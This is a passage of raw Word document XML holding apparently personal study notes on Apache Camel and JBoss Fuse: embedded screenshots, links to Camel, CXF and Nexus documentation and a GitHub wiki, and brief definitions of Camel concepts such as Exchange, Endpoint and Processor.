          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004F5DF3" w:rsidRDefault="00803932" w:rsidP="00BE0961">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="041C89FE" wp14:editId="76DB16A1">
            <wp:extent cx="5943600" cy="3148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148965"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FF732F" w:rsidRDefault="00FF732F" w:rsidP="00BE0961">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FF732F" w:rsidRDefault="004D49A4" w:rsidP="00BE0961">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId79" w:history="1">
        <w:r w:rsidR="00FF732F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>https://github.com/vasu34k123/AvivaFuseVirtualSession2/wiki/Aviva-Requirement</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00BC2A81" w:rsidRDefault="00C44365" w:rsidP="00BE0961">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4ED5B771" wp14:editId="70F1F42D">
            <wp:extent cx="5943600" cy="3423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423285"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="0031371D" w:rsidRDefault="0031371D" w:rsidP="00BE0961">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0031371D" w:rsidRDefault="0031371D" w:rsidP="00BE0961">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F87AA8" w:rsidRDefault="004D49A4" w:rsidP="00BE0961">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId81" w:history="1">
        <w:r w:rsidR="00F87AA8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>https://github.com/vasu34k123/AvivaFuseVirtualSession2/wiki/Errors-Exceptions</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00F87AA8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F87AA8">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00F87AA8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Gave up waiting for service' exception when running </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00F87AA8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>junit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00F87AA8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> test in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00F87AA8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>JBoss</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00F87AA8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Fuse</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F87AA8" w:rsidRDefault="004D49A4" w:rsidP="00BE0961">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId82" w:history="1">
        <w:r w:rsidR="00F01DFC">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>http://camel.apache.org/uris.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00F01DFC" w:rsidRDefault="00F01DFC" w:rsidP="00BE0961">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/spring.html</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F01DFC" w:rsidRDefault="00F01DFC" w:rsidP="00BE0961">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005037A5" w:rsidRDefault="004D49A4" w:rsidP="00BE0961">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId83" w:history="1">
        <w:r w:rsidR="005037A5">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>http://cxf.apache.org/docs/springboot.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00A31E02" w:rsidRDefault="00A31E02" w:rsidP="00BE0961">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A31E02" w:rsidRDefault="004D49A4" w:rsidP="00BE0961">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId84" w:history="1">
        <w:r w:rsidR="00A31E02" w:rsidRPr="00732AA2">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:sz w:val="32"/>
          </w:rPr>
          <w:t>http://www.javarticles.com/2015/05/apache-camel-timer-component-examples.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00A31E02" w:rsidRDefault="004D49A4" w:rsidP="00BE0961">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId85" w:history="1">
        <w:r w:rsidR="00B04D13">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>http://camel.apache.org/user-stories.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00E173EF" w:rsidRDefault="004D49A4" w:rsidP="00BE0961">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId86" w:history="1">
        <w:r w:rsidR="00E173EF" w:rsidRPr="00F37D43">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:sz w:val="32"/>
          </w:rPr>
          <w:t>https://github.com/vasu34k123/AvivaFuseVirtualSession2/blob/master/CamelTEchnical</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00E173EF" w:rsidRDefault="00E173EF" w:rsidP="00BE0961">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E173EF" w:rsidRDefault="00E173EF" w:rsidP="00BE0961">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pP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73EF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Message contains data which is being transferred to a route. Each message has a unique identifier and it’s constructed out of a body, headers, and attachments.</w:t>
      </w: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73EF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Exchange is the container of a message and it is created when a message is received by a consumer during the routing process.</w:t>
      </w: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73EF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Exchange allows different types of interaction between systems – it can define a one-way message or a request-response message</w:t>
      </w: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73EF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Endpoint is a channel through which system can receive or send a message. It can refer to a web service URI, queue URI, file,</w:t>
      </w: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173EF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>email</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E173EF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> address, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E173EF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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73EF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Component acts as an endpoint factory. To put it simply, components offer an interface to different technologies using the same </w:t>
      </w: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173EF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>approach</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E173EF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> and syntax. Camel already supports a lot of components in its DSLs for almost every possible technology, but it also</w:t>
      </w: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173EF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>gives</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E173EF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> the ability for writing custom components</w:t>
      </w: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173EF" w:rsidRPr="00E173EF" w:rsidRDefault="00E173EF" w:rsidP="00E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73EF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Processor is a simple Java interface which is used to add custom integration logic to a route. It contains a single process </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E173EF" w:rsidRDefault="00E173EF" w:rsidP="00E173EF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E173EF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>method</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E173EF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> used to preform custom business logic on a message received by a consumer</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A18C2" w:rsidRDefault="004D49A4" w:rsidP="00E173EF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId87" w:history="1">
        <w:r w:rsidR="001A18C2">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>http://camel.apache.org/tutorial-example-reportincident.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00DE6064" w:rsidRDefault="00DE6064" w:rsidP="00E173EF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="336579BB" wp14:editId="6884743D">
            <wp:extent cx="5476875"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76875" cy="2514600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F2277E" w:rsidRDefault="00F2277E" w:rsidP="00E173EF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5865800B" wp14:editId="782E7FFA">
            <wp:extent cx="5943600" cy="3710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710305"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F069F5" w:rsidRDefault="00F069F5" w:rsidP="00E173EF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId90" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>https://www.sonatype.com/nexus-repository-sonatype</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="009C37A4" w:rsidRDefault="009C37A4" w:rsidP="00E173EF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009C37A4" w:rsidRDefault="009C37A4" w:rsidP="00E173EF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="229A8E7E" wp14:editId="1CDAE87E">
            <wp:extent cx="5943600" cy="3721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721735"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="001E3B3F" w:rsidRDefault="001E3B3F" w:rsidP="00E173EF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001E3B3F" w:rsidRDefault="001E3B3F" w:rsidP="00E173EF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007E4E45" w:rsidRDefault="001E3B3F" w:rsidP="00E173EF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1B01B56C" wp14:editId="5F42C4B7">
            <wp:extent cx="5467350" cy="3743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67350" cy="3743325"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00624BB8">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="04C512E0" wp14:editId="203F09AE">
            <wp:extent cx="5943600" cy="2832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832735"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="0015035F" w:rsidRDefault="0015035F" w:rsidP="00E173EF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="25C154C4" wp14:editId="6023FFF8">
            <wp:extent cx="5943600" cy="2614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14295"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="007E4E45" w:rsidRDefault="007E4E45" w:rsidP="00E173EF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007E4E45" w:rsidRDefault="007E4E45" w:rsidP="00E173EF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007E4E45" w:rsidRDefault="007E4E45" w:rsidP="00E173EF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3D3DFEE5" wp14:editId="7BC33560">
            <wp:extent cx="4791075" cy="4600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91075" cy="4600575"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E35BA0" w:rsidRDefault="00E35BA0" w:rsidP="00E173EF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId96" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>https://github.com/vasu34k123/BDD-Java-JavaScript</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00035DAE" w:rsidRDefault="00035DAE" w:rsidP="00E173EF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId97" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>http://cucumber.github.com/cucumber-eclipse/update-site</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="004D49A4" w:rsidRPr="00F97F9C" w:rsidRDefault="004D49A4" w:rsidP="00E173EF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId98" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
            <w:sz w:val="36"/>
            <w:szCs w:val="36"/>
          </w:rPr>
          <w:t>http://restapi.demoqa.com/utilities/weather/city</w:t>
        </w:r>
      </w:hyperlink>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:sectPr w:rsidR="004D49A4" w:rsidRPr="00F97F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5FAB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E17CD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03382"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8C06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46470"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D870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F4538"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="92A64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534F4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6762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C241B0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="958E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66694"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EC9E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935942"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F1E4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E2471"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="809A2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F75F3F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5D6E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170B1D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1FF0A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E67AF0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3AE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61160"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6072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A0558E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E1E6E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0460E3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B9A44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CD1ADB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E382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D578CB"/>
